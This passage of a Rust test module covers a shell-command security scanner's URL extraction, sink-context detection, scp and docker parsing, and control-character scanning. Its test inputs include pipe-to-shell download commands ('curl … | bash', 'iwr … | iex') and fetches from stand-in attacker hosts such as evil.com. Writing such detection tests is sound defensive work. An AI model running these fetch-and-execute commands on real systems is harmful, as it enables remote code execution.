assert!(
urls.iter()
.any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
"leading env assignment URL should be extracted in sink context"
);
}
#[test]
fn test_extract_urls_from_quoted_leading_env_assignment() {
let urls = extract_urls(
"PAYLOAD_URL='https://example.com/install.sh' curl ok",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "https://example.com/install.sh"),
"quoted leading env assignment URL should be extracted"
);
}
#[test]
fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
let urls = extract_urls(
"HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
ShellType::Posix,
);
assert!(
!urls.iter().any(|u| u.raw == "http://proxy:8080"),
"proxy configuration URLs should not be treated as destinations"
);
}
#[test]
fn test_extract_urls_pipe() {
let urls = extract_urls(
"curl https://example.com/install.sh | bash",
ShellType::Posix,
);
assert!(!urls.is_empty());
assert!(urls[0].in_sink_context);
}
#[test]
fn test_extract_urls_scp() {
let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
assert!(!urls.is_empty());
assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
}
#[test]
fn test_extract_docker_ref() {
let urls = extract_urls("docker pull nginx", ShellType::Posix);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(docker_urls.len(), 1);
}
#[test]
fn test_extract_powershell_iwr() {
let urls = extract_urls(
"iwr https://example.com/script.ps1 | iex",
ShellType::PowerShell,
);
assert!(!urls.is_empty());
}
#[test]
fn test_wrapper_preserves_sink_context() {
let urls = extract_urls(
"env --ignore-environment curl http://example.com",
ShellType::Posix,
);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"wrapped sink commands should keep sink context"
);
}
#[test]
fn test_env_wrapper_preserves_tirith_run_sink_context() {
let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"env wrapper should preserve tirith run sink context"
);
}
#[test]
fn test_command_wrapper_preserves_tirith_run_sink_context() {
let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"command wrapper should preserve tirith run sink context"
);
}
#[test]
fn test_time_wrapper_preserves_tirith_run_sink_context() {
let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
assert!(
urls.iter()
.any(|u| u.raw == "http://example.com" && u.in_sink_context),
"time wrapper should preserve tirith run sink context"
);
}
#[test]
fn test_strip_quotes_single_char() {
assert_eq!(strip_quotes("\""), "\"");
assert_eq!(strip_quotes("'"), "'");
}
#[test]
fn test_strip_quotes_empty() {
assert_eq!(strip_quotes(""), "");
}
#[test]
fn test_scan_bytes_bel_vt_del() {
let input = b"hello\x07world";
let result = scan_bytes(input);
assert!(result.has_control_chars);
let input = b"hello\x0Bworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
let input = b"hello\x0Cworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
let input = b"hello\x7Fworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
}
#[test]
fn test_scan_bytes_osc_apc_dcs() {
let input = b"hello\x1b]0;title\x07world";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
let input = b"hello\x1b_dataworld";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
let input = b"hello\x1bPdataworld";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
}
#[test]
fn test_schemeless_long_tld() {
assert!(looks_like_schemeless_host("example.academy"));
assert!(looks_like_schemeless_host("example.photography"));
}
#[test]
fn test_segment_index_correct() {
let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
for url in &urls {
assert!(url.segment_index <= 1);
}
}
#[test]
fn test_docker_build_context_not_image() {
let urls = extract_urls("docker build .", ShellType::Posix);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(
docker_urls.len(),
0,
"build context '.' should not be treated as image"
);
}
#[test]
fn test_docker_image_subcmd() {
let urls = extract_urls("docker image pull nginx", ShellType::Posix);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(docker_urls.len(), 1);
}
#[test]
fn test_docker_run_image_after_double_dash() {
let urls = extract_urls(
"docker run --rm -- evil.registry/ns/img:1",
ShellType::Posix,
);
let docker_urls: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
.collect();
assert_eq!(docker_urls.len(), 1);
assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
}
#[test]
fn test_tier1_module_boundary_enforcement() {
let ids = tier1_generated::EXTRACTOR_IDS;
assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
assert!(exec_count > 0, "Must have exec fragments");
assert!(
paste_count >= exec_count,
"Paste fragments must be superset of exec fragments"
);
Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
.expect("Generated exec pattern must be valid regex");
Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
.expect("Generated paste pattern must be valid regex");
}
#[test]
fn test_scan_bytes_trailing_cr_not_flagged() {
let result = scan_bytes(b"/path\r");
assert!(
!result.has_control_chars,
"trailing \\r should not be flagged"
);
}
#[test]
fn test_scan_bytes_trailing_crlf_not_flagged() {
let result = scan_bytes(b"/path\r\n");
assert!(
!result.has_control_chars,
"trailing \\r\\n should not be flagged"
);
}
#[test]
fn test_scan_bytes_windows_multiline_not_flagged() {
let result = scan_bytes(b"line1\r\nline2\r\n");
assert!(
!result.has_control_chars,
"Windows \\r\\n line endings should not be flagged"
);
}
#[test]
fn test_scan_bytes_embedded_cr_still_flagged() {
let result = scan_bytes(b"safe\rmalicious");
assert!(
result.has_control_chars,
"embedded \\r before non-\\n should be flagged"
);
}
#[test]
fn test_scan_bytes_mixed_crlf_and_attack_cr() {
let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
assert!(
result.has_control_chars,
"attack \\r mixed with \\r\\n should be flagged"
);
}
#[test]
fn test_scan_bytes_only_cr() {
let result = scan_bytes(b"\r");
assert!(
!result.has_control_chars,
"lone trailing \\r should not be flagged"
);
}
#[test]
fn test_schemeless_skip_curl_output_flag() {
let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"lenna.png should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_skip_curl_output_combined() {
let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"-olenna.png should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_skip_wget_output_flag() {
let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"output.html should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_skip_wget_combined() {
let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
schemeless.is_empty(),
"-Ooutput.html should not be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_real_domain_still_detected() {
let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
!schemeless.is_empty(),
"evil.com/payload should be detected as schemeless URL"
);
}
#[test]
fn test_schemeless_user_at_host_detected_in_sink_context() {
let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert_eq!(schemeless.len(), 1);
assert_eq!(schemeless[0].raw, "user@bit.ly");
}
#[test]
fn test_scp_user_at_host_not_treated_as_schemeless_url() {
let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(schemeless.is_empty());
}
fn scp_has_schemeless(cmd: &str, shell: ShellType) -> bool {
extract_urls(cmd, shell)
.iter()
.any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
}
#[test]
fn test_scp_plain_host_path_not_schemeless() {
assert!(!scp_has_schemeless(
"scp test.asdf testhost:/home/user/",
ShellType::Posix
));
}
#[test]
fn test_scp_plain_host_relative_path_not_schemeless() {
assert!(!scp_has_schemeless(
"scp file.txt host:dir/",
ShellType::Posix
));
}
#[test]
fn test_rsync_plain_host_path_not_schemeless() {
assert!(!scp_has_schemeless(
"rsync -av src host:/dest/",
ShellType::Posix
));
}
#[test]
fn test_scp_one_letter_alias_posix_accepted() {
assert!(!scp_has_schemeless("scp file x:/tmp/", ShellType::Posix));
}
#[test]
fn test_scp_windows_backslash_always_rejected() {
assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Posix).is_none());
assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::PowerShell).is_none());
assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Cmd).is_none());
assert!(parse_scp_remote_spec("D:\\backup", ShellType::Posix).is_none());
}
#[test]
fn test_scp_windows_forward_slash_shell_scoped() {
assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::PowerShell).is_none());
assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Cmd).is_none());
assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Posix).is_some());
assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Fish).is_some());
}
#[test]
fn test_scp_windows_ambiguous_drive_letter_accepted() {
for shell in [
ShellType::Posix,
ShellType::Fish,
ShellType::PowerShell,
ShellType::Cmd,
] {
assert!(
parse_scp_remote_spec("C:foo", shell).is_some(),
"C:foo should parse as remote in shell {shell:?}"
);
assert!(
parse_scp_remote_spec("D:backup/x.txt", shell).is_some(),
"D:backup/x.txt should parse as remote in shell {shell:?}"
);
}
}
#[test]
fn test_scp_rejects_url_scheme() {
assert!(parse_scp_remote_spec("http://evil.com/a.sh", ShellType::Posix).is_none());
assert!(parse_scp_remote_spec("https://a.b/c", ShellType::Posix).is_none());
}
#[test]
fn test_scp_rejects_flag_and_absolute_local() {
assert!(parse_scp_remote_spec("-P", ShellType::Posix).is_none());
assert!(parse_scp_remote_spec("--port=22", ShellType::Posix).is_none());
assert!(parse_scp_remote_spec("/tmp:weird", ShellType::Posix).is_none());
}
#[test]
fn test_scp_accepts_user_at_host_forms() {
assert!(parse_scp_remote_spec("user@server.com:file.txt", ShellType::Posix).is_some());
assert!(parse_scp_remote_spec("user@host:/path", ShellType::Posix).is_some());
}
#[test]
fn test_scp_rejects_missing_parts() {
assert!(parse_scp_remote_spec("", ShellType::Posix).is_none());
assert!(parse_scp_remote_spec(":path", ShellType::Posix).is_none()); assert!(parse_scp_remote_spec("@host:path", ShellType::Posix).is_none()); assert!(parse_scp_remote_spec("user@:path", ShellType::Posix).is_none());
}
#[test]
fn test_scp_rejects_host_with_slash() {
assert!(parse_scp_remote_spec("foo/bar:baz", ShellType::Posix).is_none());
}
#[test]
fn test_parse_scp_remote_spec_fields_populated() {
let spec = parse_scp_remote_spec("user@server.com:/path", ShellType::Posix).unwrap();
assert_eq!(spec.user.as_deref(), Some("user"));
assert_eq!(spec.host, "server.com");
assert_eq!(spec.path, "/path");
let spec = parse_scp_remote_spec("host:/dest/", ShellType::Posix).unwrap();
assert_eq!(spec.user, None);
assert_eq!(spec.host, "host");
assert_eq!(spec.path, "/dest/");
}
#[test]
fn test_schemeless_png_no_slash_is_file() {
assert!(!looks_like_schemeless_host("lenna.png"));
}
#[test]
fn test_schemeless_tld_overlap_with_path_is_domain() {
assert!(looks_like_schemeless_host("evil.zip/payload"));
assert!(looks_like_schemeless_host("evil.sh/payload"));
}
#[test]
fn test_schemeless_tld_overlap_without_path_is_file() {
assert!(!looks_like_schemeless_host("lenna.zip"));
assert!(!looks_like_schemeless_host("script.sh"));
}
#[test]
fn test_schemeless_tld_overlap_sink_context_detected() {
let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
let schemeless: Vec<_> = urls
.iter()
.filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
.collect();
assert!(
!schemeless.is_empty(),
"evil.zip/payload should be detected as schemeless URL in sink context"
);
}
}